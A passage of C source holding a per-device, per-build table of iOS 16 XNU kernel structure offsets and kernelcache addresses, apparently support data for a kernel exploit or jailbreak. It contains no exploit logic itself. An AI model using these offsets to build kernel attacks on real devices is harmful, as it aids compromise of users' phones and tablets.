0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2f1288, .kernelcache__gPhysBase = 0xfffffff0078f80e0, .kernelcache__gPhysSize = 0xfffffff0078f80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f62b8, .kernelcache__perfmon_devices = 0xfffffff00a32f500, .kernelcache__perfmon_dev_open = 0xfffffff007ea9c8c, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a32e990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a32e988, .kernelcache__vn_kqfilter = 0xfffffff007ef8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad Mini 5th Gen // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a225178, .kernelcache__gPhysBase = 0xfffffff00781bc60, .kernelcache__gPhysSize = 0xfffffff00781bc60 + 8, .kernelcache__gVirtBase = 0xfffffff007819e40, .kernelcache__perfmon_devices = 0xfffffff00a260380, .kernelcache__perfmon_dev_open = 0xfffffff007e873ac, .kernelcache__ptov_table = 0xfffffff0077cf248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a25f800, .kernelcache__vm_pages = 0xfffffff0077cc080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a25f7f8, .kernelcache__vn_kqfilter = 0xfffffff007ed9a44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", 